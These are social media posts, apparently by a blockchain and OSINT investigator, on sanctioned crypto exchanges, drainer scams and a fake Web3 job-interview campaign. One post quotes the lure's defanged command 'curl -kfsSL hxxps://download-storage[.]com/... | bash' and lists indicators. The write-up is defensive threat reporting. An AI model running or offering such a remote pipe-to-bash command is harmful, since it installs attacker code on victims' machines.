Currently choosing the topic for my next research project. I’m looking into privacy, especially Zcash, Monero, privacy technologies, and how they look from an investigator’s perspective 🕵️♂️
At OFFZONE, I researched Web3 scam websites, recurring code patterns, and infrastructure reuse. At KazHackStan and ZeroNights, I spoke about cross-chain bridge exploits, why they happen, where the architecture breaks, and how stolen funds are laundered afterward.
Now I want to dig into something new.
If you’ve had a research idea sitting in your head for a while but never had the time or motivation to actually build it, send it my way.
Or even better, let’s collaborate and make something cool together 🫵
Especially interested in privacy, blockchain investigations, OSINT, and weird intersections between all of them
over $950M sent to Grinex, Garantex and A7. shared wallet infrastructure with sanctioned Grinex. but sure, TokenSpot was just another independent crypto exchange lol
the UK just sanctioned TokenSpot alongside Cryptomus and Heleket as part of its latest Russia sanctions package
and the Cryptomus/Heleket situation is even funnier
Heleket launched in January 2025, just one month before Cryptomus introduced mandatory KYC. TRM later found they shared staff and infrastructure.
both are now sanctioned)))
makes you wonder how many other crypto services are helping Russia move money around sanctions while pretending to be completely unrelated businesses
@SlowMist_Team@fomo we went from “don’t paste random JS into DevTools” to “drag this into your bookmarks and click it three times”
self-XSS playbook, just better UX for the attacker 💀
@cz_binance Here’s the part that worries me: scammers can ship an “AI-proof wallet migration” drainer long before anyone figures out how to break ECDSA
No advanced math needed, just one bad signature 😭
By the way, I found a bunch of other videos with the same girl promoting different scam sites, and I found her TikTok too
As soon as I get a bit more free time, I’ll start unpacking the malware, checking what it actually does, where it connects, what it steals, and then keep digging into the persona and the infrastructure around her
Looks like this rabbit hole is a lot bigger than I expected :)
How a Blockchain Analyst vacancy ended with curl | bash
A few days ago, I applied for a Blockchain Analyst role at WhatIf through LinkedIn.
https://t.co/MuKmHhJDnB
At first glance, everything looked completely normal: a proper job description, Web3/blockchain research, on-chain analytics, remote US, and a salary range of $85k–125k/year. The vacancy itself was genuinely published from WhatIf’s LinkedIn page.
The company also has a normal-looking public footprint. The page has been around for a while, WhatIf lists 2019 as its founding year, Dubai as its location, 2–10 employees, and blockchain among its areas of work.
https://t.co/MuKmHhJDnB
https://t.co/hPGP6mbIDf
After applying, I got an email from someone named Emma Martin, from an address displayed as [email protected].
The first email had basically zero red flags: when I could start, whether I was okay with remote work, salary expectations, years of experience, and which part of my background was most relevant to the role.
Then they scheduled an interview through RelayArc.
https://t.co/o34tVDkTZ8
The first weird thing: you literally cannot join the meeting from a phone. The page says: Desktop required.
Fine. I opened the link on my Mac and got into a pretty convincing video-call interface. On the other side was Emma Martin.
But pretty quickly it became obvious that this wasn’t a normal conversation.
The video looked pre-recorded, and after a few minutes the chat started following a script:
“Can you see and hear me okay?”
Then:
“I still cannot hear you…”
And finally, they suggested using the built-in microphone troubleshooting.
That’s where the actual delivery starts.
RelayArc says the browser supposedly failed to detect the microphone, and that to get full audio support you need to install RelayArc for Mac.
Big button, normal-looking troubleshooting flow, basically what you would expect from Zoom or something similar.
Click Download App and suddenly, instead of a .dmg, App Store link, or at least a signed installer, you get instructions to:
open Terminal and run a command.
The page showed something like:
curl -kfsSL hxxps://download-storage[.]com/... | bash
So the “meeting platform” is telling you to download content from another domain and pipe it directly into bash.
At that point, the “interview” was over.
The chain was actually pretty clean:
LinkedIn vacancy → recruiter → screening → scheduled interview → fake video call → artificial microphone issue → “desktop app” → curl | bash
About a month ago, another person described a very similar Web3 recruitment campaign: a job through LinkedIn, then an interview on an unknown meeting platform called Werknova, while the recruiter used the exact same name: Emma Martin.
They also noticed that the interaction looked pre-recorded.
I’m not saying at this point that WhatIf itself is behind the campaign. That still needs separate investigation: whether the email was actually authenticated through https://t.co/AFKiCZOSTT infrastructure, whether a corporate account/domain was compromised, or whether some other technique was used.
But the infection flow itself is already pretty obvious.
Current IOCs / artifacts:
relayarc[.]io
Persona: Emma Martin
Lure: Blockchain Analyst / Web3 recruitment
Execution: remote shell script via curl ... | bash
Now I’m curious what exactly they were trying to install, where the script connects, what it collects, and whether RelayArc infrastructure overlaps with other fake-interview campaigns.
So there will probably be a part two :)
The FBI has released its 2025 Internet Crime Report: Americans lost nearly $21B to cybercrime last year.
Over $11B came from crypto-related fraud, mainly investment scams. AI-enabled crimes caused nearly $893M in losses.
Operation Level Up alone has already helped save victims more than $500M.
Public-private collaboration and on-chain tracking remain critical to dismantling these scam networks.
Read the full IC3 report: https://t.co/z7o7uKyfhb
Hey 👋
I’m just a regular guy from Kazakhstan trying to build my own brand in blockchain investigations, OSINT, and cybersecurity.
In my local community I’m already somewhat known - I speak at events, share research, and run a Telegram channel where I post deep dives on crypto crime, laundering schemes, APT activity, and investigation techniques.
But I want to grow beyond local.
I want to build something bigger, international and valuable.
If you’re into on-chain investigations, threat intelligence, OSINT workflows, scam breakdowns, or real-world crypto cases
follow along.
And if you have ideas on what you’d actually like to see here, drop a comment or DM me.
I’m building my own style and I want to create content that’s actually useful
Let’s build.
https://t.co/b6XRwkOmQp